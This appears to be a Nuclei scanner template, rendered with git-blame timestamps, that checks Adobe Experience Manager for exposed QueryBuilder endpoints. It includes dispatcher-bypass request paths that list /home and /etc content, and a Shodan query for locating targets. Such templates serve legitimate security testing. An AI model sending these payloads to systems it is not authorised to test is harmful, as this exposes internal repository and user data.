2021-04-05 17:42:25 +00:00
|
|
|
id: aem-querybuilder-internal-path-read
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: AEM QueryBuilder Internal Path Read
|
2022-04-22 10:38:41 +00:00
|
|
|
author: DhiyaneshDk
|
2021-04-05 17:42:25 +00:00
|
|
|
severity: medium
|
2024-01-03 06:08:41 +00:00
|
|
|
description: AEM QueryBuilder is vulnerable to LFI.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
|
2022-07-25 17:37:20 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 4
|
2022-07-25 17:37:20 +00:00
|
|
|
shodan-query: http.component:"Adobe Experience Manager"
|
2023-06-02 23:20:49 +00:00
|
|
|
tags: aem,misconfig
|
2021-04-05 17:42:25 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-04-05 17:42:25 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1'
|
|
|
|
- '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1'
|
|
|
|
- '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
|
|
|
|
- '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'
|
2021-04-05 18:25:18 +00:00
|
|
|
|
2021-09-02 11:59:10 +00:00
|
|
|
stop-at-first-match: true
|
2023-10-14 11:27:55 +00:00
|
|
|
|
2021-04-05 17:42:25 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2021-04-05 18:25:18 +00:00
|
|
|
|
2021-04-05 17:42:25 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
2021-04-05 18:25:18 +00:00
|
|
|
- 'jcr:path'
|
2021-04-13 19:54:00 +00:00
|
|
|
- 'success'
|
2023-10-14 11:27:55 +00:00
|
|
|
condition: and
|
2024-01-15 11:49:24 +00:00
|
|
|
# digest: 4b0a00483046022100f6628f96cb4d633f700b66bc68bbff50e14437f1a7206af406d989d8e89b4943022100a70d967a5e148a69a9c18bdf1374c0f56e87283969a4ddc38eb81b9aa0af0421:922c64590222798bb761d5b6d8e72950
|